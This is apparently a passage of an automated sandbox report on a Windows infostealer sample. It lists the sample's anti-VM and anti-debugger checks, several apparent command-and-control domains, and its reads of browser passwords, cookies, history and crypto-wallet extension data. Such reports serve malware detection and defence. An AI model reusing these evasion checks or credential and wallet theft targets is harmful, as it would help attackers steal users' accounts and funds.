              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70960 second address: 4F70981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F646CD1477Ah 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70981 second address: 4F70987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70987 second address: 4F7098C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F7098C second address: 4F709C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F646C53F7AAh 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, dword ptr [ebp+0Ch] 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 jmp 00007F646C53F7B3h 0x00000018 popad 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F709C0 second address: 4F709C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F709C4 second address: 4F709CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F709CA second address: 4F709E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F64DD182155h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov dh, al 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F709E3 second address: 4F70A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646C53F7B4h 0x00000009 popad 0x0000000a cmp dword ptr [7544459Ch], 05h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70A08 second address: 4F70A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70A0C second address: 4F70A1B instructions: 0x00000000 rdtsc 0x00000002 mov ax, 7EC9h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a mov eax, 70DDBD0Bh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70A1B second address: 4F70A32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F64DD19A1EBh 0x0000000d pushad 0x0000000e mov si, 03DFh 0x00000012 push eax 0x00000013 push edx 0x00000014 mov bx, ax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70ACA second address: 4F70AED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70AED second address: 4F70AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 5C2Fh 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70AF6 second address: 4F70AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 6Ch 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70B1B second address: 4F70B21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70B21 second address: 4F70B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d call 00007F646C53F7ACh 0x00000012 pop esi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70B46 second address: 4F70B91 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F646CD1477Bh 0x00000008 add cx, CD7Eh 0x0000000d jmp 00007F646CD14789h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F646CD14784h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70B91 second address: 4F70BA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70BA0 second address: 4F70BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: 4F70BA6 second address: 4F70BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Special instruction interceptor: First address: E07E6B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Special instruction interceptor: First address: E07F1B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Special instruction interceptor: First address: FB5B8A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\661fW9gxDp.exe TID: 7868 | Thread sleep time: -180000s >= -30000s
              Source: C:\Users\user\Desktop\661fW9gxDp.exe TID: 7884 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: 661fW9gxDp.exe, 00000000.00000002.1577828864.0000000000F85000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696497155j
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696497155t
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696497155o
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696497155x
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447407656.0000000005924000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696497155p
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696497155f
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWL
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696497155t
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696497155s
              Source: 661fW9gxDp.exe, 00000000.00000002.1577828864.0000000000F85000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: NTICE
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: SICE
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: SIWVID
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: rapeflowwj.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: crosshuaht.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: sustainskelet.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: aspecteirs.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: energyaffai.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: necklacebudi.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: discokeyus.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: grannyejh.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: sweepyribs.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577828864.0000000000F85000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: g.zProgram Manager
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: 661fW9gxDp.exe, 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1576242394.0000000005909000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1580265493.000000000590C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: 661fW9gxDp.exe PID: 7684, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
